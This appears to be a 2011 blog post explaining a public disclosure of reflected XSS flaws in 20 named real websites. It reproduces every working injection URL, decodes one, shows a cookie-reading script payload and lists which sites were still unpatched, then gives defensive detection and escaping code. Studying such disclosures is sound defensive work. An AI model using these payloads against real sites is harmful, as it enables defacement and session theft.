Full Disclosure – 20 high profile sites vulnerable to XSS attacks

On Thursday morning a post appeared on the popular Full Disclosure Internet discussion group listing XSS vulnerabilities in no less than 20 high profile websites. Amongst the vulnerable are McDonalds, IEEE Explore, Harvard University, and energy.gov. The vulnerabilities were discovered by a hacker who goes by the handle *Invectus*.

Is an XSS Vulnerability a big deal?

XSS vulnerabilities (Cross-Site Scripting vulnerabilities) are often overshadowed by their big cousin, the infamous SQL Injection. This does not make them any less effective or deadly. XSS and SQL Injection attacks are similar in the way they inject malicious code. The difference is that an SQL Injection attack injects code into the target database, whereas an XSS attack injects code into the target browser. In an XSS attack the hacker uses your website to inject code into your visitor’s browser.

Once a user is infected, the malicious code can do a variety of things. It can change the colour scheme of the page the user is viewing. It can do nastier things such as replacing images with pornographic content. Using the same techniques, links on the page may be rewritten to point to malicious locations. Sometimes clicks can also be forced, simulating user action without the user’s knowledge. Another popular XSS attack reads out the user’s cookie and transmits it to the hacker. This allows him to impersonate the user and hijack his session. If the user happens to be the system administrator, the hacker can take over the entire website.

How to: XSS McDonalds

Below is the entire list of websites that were disclosed as vulnerable. At first glance the list is long and cryptic, but with some basic hacker techniques we can soon make some sense out of them.

//video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBoZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D

//www.telegraph.co.uk/search/?queryText=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

//www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&noMimimumKeywords=false

//www.schools.nsw.edu.au/psearch/ext/?refine=new&QueryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&Go.x=29&Go.y=25&Go=submit

//thetablet.co.uk/search.php?q=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

//www.scstatehouse.gov/cgi-bin/query.exe?first=FIRST&querytext=&category=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

//www.highered.tafensw.edu.au/vsearch/tafehigheredu/?QueryText=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

//www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

//www.watersportholland.nl/cgi-bin/watersportholland/zoeken.cgi?search=Vera&query=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

//www.gpo.gov/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

//www.networkcomputing.com/sitesearch?sort=publishDate+desc&queryText=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

//www.unc.edu/search/index.htm?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&cx=014532668884084418890%3Ajyc_iub1byy&cof=FORID%3A10&ie=UTF-8&hq=inurl%3Adevnet.unc.edu

//cugir.mannlib.cornell.edu/search?querytext=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

//ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT.+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13

//vivo-vis.cns.iu.edu/vivo1/search?querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

//google.nyu.edu/search?site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E&x=8&y=6

//ofa.fas.harvard.edu/cal/search.php?q=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

//www.uidaho.edu/search?q=%22%3E%3Cscript%3EInvectus%3C/script%3E&cof=FORID:9&cref=//www.uidaho.edu/search?xml=1&ticks=634508915004972966

//vivo.ufl.edu/search?flag1=1&querytext=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png%22+height%3D%22650%22+width%3D%221000%22%3E

//energy.gov/search/site/%22%3E%3Cimg%20src%3D%22http%3A//i55.tinypic.com/witu7d.png%22%20height%3D%22650%22%20width%3D%221000%22%3E

Understanding XSS

I will take the www.mcdonalds.com vulnerability to help explain XSS in more detail.

The raw XSS attack is repeated below:

//www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

The first thing we will do is separate the URL from the query. We split at the first question mark (?) and get two parts:

1. URL Part:

//www.mcdonalds.com/content/us/en/search/search_results.html

2. Query Part

queryText=%22%3E%3Cimg%20src=%22//i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

The URL part identifies the vulnerable file on the server. In this case the vulnerability lies within the search functionality of the site, a very common attack vector for both SQL Injection and XSS attacks.

The Query Part is the actual attack code. You will notice lots of % symbols: these are URL-encoded (percent-encoded) characters, and they are difficult to read without the right tools. I use the Acunetix HTTP Editor tool that is bundled with Acunetix WVS to decode URL-encoded Query Parts.

The human-readable Query Part now looks like this:

queryText="><img src="//i55.tinypic.com/witu7d.png" height="650" width="1000">

This payload is hardly malicious. It injects the image of a flag into the McDonalds web page. I tested it out assuming that McDonalds would have fixed this security flaw immediately, and I was surprised to find that the vulnerability is still there.
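The split-and-decode steps above, written out as an added Python example (it is not code from the original post, nor an Acunetix tool): it splits at the first question mark, percent-decodes each query parameter and reports which decoded values contain an HTML tag. It also covers the two other encodings that appear in the list above, the base64 path segment in the video.state.gov entry and the .QT./.EQ. substitution in the IEEE entry (that the site substitutes .QT. for a quote and .EQ. for an equals sign is inferred from the entry's shape, an assumption), and it finishes with the fix side: the same value reflected raw into an attribute beside the same value HTML-escaped on output. The three sample URLs are copied from the list, keeping the scheme-relative // form they have there.

```python
import base64
import html
import re
from urllib.parse import parse_qsl, unquote, unquote_plus

# Three entries copied from the disclosed list. They carry the same payload in
# three encodings: plain percent-encoding (McDonald's), a base64 path segment
# (video.state.gov) and IEEE Xplore's .QT./.EQ. stand-ins for quote and equals
# (inferred from the entry's shape; an assumption).
SAMPLE_URLS = {
    "mcdonalds": (
        "//www.mcdonalds.com/content/us/en/search/search_results.html"
        "?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22"
        "%20height=%22650%22%20width=%221000%22%3E"
    ),
    "state.gov": (
        "//video.state.gov/en/search/img-srchttp-i55tinypiccom-witu7dpng-height650-width1000/"
        "Ij48aW1nIHNyYz0iaHR0cDovL2k1NS50aW55cGljLmNvbS93aXR1N2QucG5nIiBo"
        "ZWlnaHQ9IjY1MCIgd2lkdGg9IjEwMDAiPg%3D%3D"
    ),
    "ieee": (
        "//ieeexplore.ieee.org./search/freesearchresult.jsp?newsearch=true"
        "&queryText=.QT.%3E%3Cimg+src.EQ..QT.http%3A%2F%2Fi55.tinypic.com%2Fwitu7d.png.QT."
        "+height.EQ..QT.650.QT.+width.EQ..QT.1000.QT.%3E&x=58&y=13"
    ),
}

# An HTML start or end tag: '<', optional '/', then a tag name.
TAG_RE = re.compile(r"<\s*/?[A-Za-z][A-Za-z0-9]*")


def split_url(url):
    """Step 1 of the walkthrough: URL part and query part, split at the first '?'."""
    url_part, _, query_part = url.partition("?")
    return url_part, query_part


def decode_layers(raw, plus_is_space):
    """Plausible decodings of one value: percent-decoding repeated until it stops
    changing (catches double encoding), the .QT./.EQ. substitution, and a base64
    decode when the value is valid base64 that yields printable text."""
    unq = unquote_plus if plus_is_space else unquote
    text = raw
    for _ in range(3):  # bounded so a pathological value cannot loop forever
        decoded = unq(text)
        if decoded == text:
            break
        text = decoded
    text = text.replace(".QT.", '"').replace(".EQ.", "=")
    layers = [text]
    try:
        b64 = base64.b64decode(text, validate=True).decode("utf-8")
        if b64.isprintable():
            layers.append(b64)
    except ValueError:  # not base64, bad padding, or not UTF-8 text
        pass
    return layers


def find_injected_tags(url):
    """(location, decoded value) for every query parameter or path segment whose
    decoded form contains an HTML tag, i.e. markup that a page echoing the value
    unescaped would render."""
    url_part, query_part = split_url(url)
    hits = []
    # parse_qsl percent-decodes once and treats '+' as a space, as a form would
    for name, value in parse_qsl(query_part, keep_blank_values=True):
        for layer in decode_layers(value, plus_is_space=True):
            if TAG_RE.search(layer):
                hits.append((f"query:{name}", layer))
                break
    # in a path '+' is literal, so decode without the plus rule
    for segment in url_part.split("/"):
        for layer in decode_layers(segment, plus_is_space=False):
            if TAG_RE.search(layer):
                hits.append(("path", layer))
                break
    return hits


def reflect_unsafe(term):
    """A search page echoing the term straight into an attribute: the payload's
    leading '">' closes the attribute and the tag, so the <img> becomes markup."""
    return f'<input name="queryText" value="{term}">'


def reflect_escaped(term):
    """The fix: HTML-encode on output so '<', '>' and '"' stay data."""
    return f'<input name="queryText" value="{html.escape(term, quote=True)}">'


def renders_extra_tags(page_html):
    """True when the browser would parse more than the single <input> tag."""
    return len(TAG_RE.findall(page_html)) > 1


if __name__ == "__main__":
    for site, url in SAMPLE_URLS.items():
        for where, value in find_injected_tags(url):
            print(f"{site}: tag in {where}: {value}")
            print("  raw reflection adds tags:", renders_extra_tags(reflect_unsafe(value)))
            print("  escaped reflection adds tags:", renders_extra_tags(reflect_escaped(value)))
```

All three entries decode to the identical payload, which is why the same image appeared on every affected site: only the transport encoding differs. The escaping in reflect_escaped is the output-side fix that turns the closing quote and angle brackets back into inert text.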

This attack is pretty innocuous as it is; however, a crafty hacker will most likely manage to inject other malicious code, such as the code below, which displays the user’s cookie:

<IMG SRC=javascript:alert('Your cookie is this:' + document.cookie)>

I decided to check the other websites to see if they had patched their sites after the disclosure was announced. You will find my results in the next sections.

Winners and Losers

I categorised the original list into the Winners, those who fixed the vulnerability within 24 hours of its disclosure, and the Losers, those who left the security flaw there for everyone to exploit. Within the next few days hackers will be having a field day with the Losers, especially those like IEEE Explore who serve paid content from their site.

Winners - Vulnerability is fixed:

  • Harvard University
  • US Department of State
  • Energy.gov
  • The Telegraph UK
  • University of North Carolina
  • Cornell University
  • University of Idaho

Losers - Website is still vulnerable:

  • McDonalds
  • US Government Printing Office
  • TAFE Higher Education
  • Watersportholland.nl
  • IEEE Explore
  • DSM
  • South California Legislature
  • Networkcomputing.com
  • VIVO
  • NYU Stern
  • The Tablet UK
  • NSW Public Schools

How to be a Winner

It is very probable that the hacker used automated tools to scan these web sites and automatically discover vulnerabilities. The injection code for each page is slightly different, so the hacker must have tweaked the payload for each site to make his injection successful.

If you want to stay one step ahead you will need to use tools similar to those the hacker uses. The most common one is a Web Vulnerability Scanner that supports automatic XSS detection. You will need to scan your website periodically to ensure that updates to the site do not expose new flaws.

Final Thoughts

In this case our hacker single-handedly defaced 20 big web sites using XSS. The companies were lucky because the hacker did not have any malicious intent other than exposing them. The danger is what will come next: now that this list is in the wild, the black-hats of the hacker community will pounce on every exposed vulnerability that is not patched.

If your website is on the list above you’d better do something about it now. If you want to make sure that your site never appears on such a list, run regular scans and code reviews to fix any XSS vulnerabilities you may find.


  1. Really nice finds, and it’s kinda interesting and shocking to see McD not even interested in fixing it.

    September 13, 2011 at 5:59 pm Reply